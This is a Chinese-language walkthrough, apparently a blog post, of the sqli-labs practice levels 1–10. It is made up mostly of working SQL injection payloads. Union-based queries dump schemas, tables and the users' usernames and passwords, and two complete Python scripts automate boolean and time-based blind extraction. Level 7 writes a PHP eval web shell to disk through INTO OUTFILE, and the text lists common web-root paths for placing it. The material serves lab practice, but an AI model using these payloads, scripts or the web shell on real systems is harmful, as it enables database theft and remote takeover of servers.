GET注入
less1:
?id=1’ #报错
?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常
?id=1’ order by 3–+ #正常
?id=-1’ union select 1,2,3–+ #2为显示位
?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+
?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+
?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users” and table_schema=“security”–+
?id=-1’ union select 1,group_concat(id,username,password),3 from security.users–+
//?id=-1’ union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)–+
less2:
//当为
'$id'时,id=1'时,报错''1'' LIMIT 0,1',id=1"时,报错'1"'// 当为$id时,
id=1'报错'' LIMIT 0,1',id=1",报错'" LIMIT 0,1'?id=1 and 1=1–+
?id=1 and 1=2–+
?id=1 order by 3–+
?id=-1 union select 1,2,3–+
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata–+
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users” and table_schema=“security”–+
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users–+
less3:
当
id=1'报错:''1'') LIMIT 0,1'可以看出原id是('$id')方式拼接到sql语句。?id=1’) and 1=1–+ #正常返回id=1的用户
?id=1’) and 1=2–+ #无查询结果
?id=1’) order by 3–+
?id=-1’) union select 1,2,3–+
?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata–+
?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+
?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users” and table_schema=“security”–+
?id=-1’) union select 1,group_concat(username),group_concat(password) from security.users–+
less4:
当
id=1"报错'"1"") LIMIT 0,1'#可以看出原语句为("$id")?id=1") and 1=1–+ #正常返回id=1的用户
?id=1") and 1=2–+ #无查询结果
?id=1") order by 3–+
?id=-1") union select 1,2,3–+
?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata–+
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users” and table_schema=“security”–+
?id=-1") union select 1,group_concat(username),group_concat(password) from security.users–+
布尔盲注
less5:
当输入
id=1'时,报错''1'' LIMIT 0,1'#可以看出原语句拼接方式为'$id'当输入
id=1'--+时,显示You are in...........#当查询正确时,显示`` You are in`错误时无返回或者报错
盲注脚本:
import requests
url="http://169.254.95.14/sqli_lab/Less-5/?id=1' and "
def name(db_name,t_name,d_name,num):
for j in range(0,20):
res=''
for i in range(1,20):
l=0
r=127
mid=(l+r)>>1
while(l<r):
pay0="(ascii(mid((select schema_name from information_schema.schemata limit {0},1),{1},1))>{2})--+".format(j,i,mid)
pay1="(ascii(mid((select table_name from information_schema.tables where table_schema='"+db_name+"' limit {0},1),{1},1))>{2})--+".format(j,i,mid)
pay2="(ascii(mid((select column_name from information_schema.columns where table_name='"+t_name+"' and table_schema='"+db_name+"' limit {0},1),{1},1))>{2})--+".format(j,i,mid)
pay3="(ascii(mid((select "+d_name+" from "+db_name+"."+t_name+" limit {0},1),{1},1))>{2})--+".format(j,i,mid)
if(num==0):
r1=requests.get(url+pay0)
if(num==1):
r1=requests.get(url+pay1)
if(num==2):
r1=requests.get(url+pay2)
if(num==3):
r1=requests.get(url+pay3)
if("You are in" in r1.text):
l=mid+1
else:
r=mid
mid = (l+r)>>1
if(mid==0):
break
res+=chr(mid)
if(res==''):
break
print(res)
def main():
print("所有数据库的名称:")
name('','','',0)
db_name=input("请输入要查询表的数据库名称:")
name(db_name,'','',1)
t_name=input("请输入要查询字段名的表名:")
name(db_name,t_name,'',2)
d_name=input("请输入要查询内容的字段名:")
name(db_name,t_name,d_name,3)
if __name__ == "__main__":
main()
less6:
将less5的盲注脚本中url改为http://169.254.95.14/sqli_lab/Less-6/?id=1" and即可
文件写入/布尔盲注
less7:
-
不像之前的会报错报错位置,只会提示语句错误。可以一个个试试。
面对
'会报错,但对于"不报错,猜测闭合语句用了',然后根据出题的意图,当id=1'))--+不报错。所以闭合正确。
然后将less5的url改为
url="http://169.254.95.14/sqli_lab/Less-6/?id=1')) and " -
根据提示的“ You are in… Use outfile… ”,可以写一句话。不过要获取绝对路径。
winserver的iis默认路径是c:/inetpub/wwwroot/
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就/var/www/htm,/var/www/html/htdocs
- @@datadir 读取数据库路径
- @@basedir MYSQL 获取安装路径
?id=1')) union select 1,2,'<?php @eval($_POST[1]);?>' into outfile 'c:\\phpStudy\\PHPTutorial\\WWW\\1.php'--+
less8:
方法同上,判断出id=1'--+完成闭合
和less5的区别就是在输入错误语句后不会报错。
时间盲注
less9:
这道比较狠,不管输入什么都是You are in,看了源码发现就是sql语句不管对错,直接输出You are in,所以算是没有报错的盲注。
可以使用时间盲注的方法sleep()
盲注脚本,在原布尔盲注基础上修改为用响应时间作为判断:
import requests
import time
import datetime
url="http://169.254.95.14/sqli_lab/Less-9/?id=1' and "
def name(db_name,t_name,d_name,num):
for j in range(0,20):
res=''
for i in range(1,20):
l=0
r=127
mid=(l+r)>>1
while(l<r):
pay0="if(ascii(mid((select schema_name from information_schema.schemata limit {0},1),{1},1))>{2},1,sleep(0.1))--+".format(j,i,mid)
pay1="if(ascii(mid((select table_name from information_schema.tables where table_schema='"+db_name+"' limit {0},1),{1},1))>{2},1,sleep(0.1))--+".format(j,i,mid)
pay2="if(ascii(mid((select column_name from information_schema.columns where table_name='"+t_name+"' and table_schema='"+db_name+"' limit {0},1),{1},1))>{2},1,sleep(0.1))--+".format(j,i,mid)
pay3="if(ascii(mid((select "+d_name+" from "+db_name+"."+t_name+" limit {0},1),{1},1))>{2},1,sleep(0.1))--+".format(j,i,mid)
if(num==0):
r1=requests.get(url+pay0)
if(num==1):
r1=requests.get(url+pay1)
if(num==2):
r1=requests.get(url+pay2)
if(num==3):
r1=requests.get(url+pay3)
if(r1.elapsed.total_seconds()<0.1):
l=mid+1
else:
r=mid
mid = (l+r)>>1
if(mid==0):
break
res+=chr(mid)
if(res==''):
break
print(res)
def main():
print("所有数据库的名称:")
name('','','',0)
db_name=input("请输入要查询表的数据库名称:")
name(db_name,'','',1)
t_name=input("请输入要查询的表名:")
name(db_name,t_name,'',2)
d_name=input("请输入要查询的字段名:")
name(db_name,t_name,d_name,3)
if __name__ == "__main__":
main()
less10
试一下less9的url,将'改为"即可
400
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
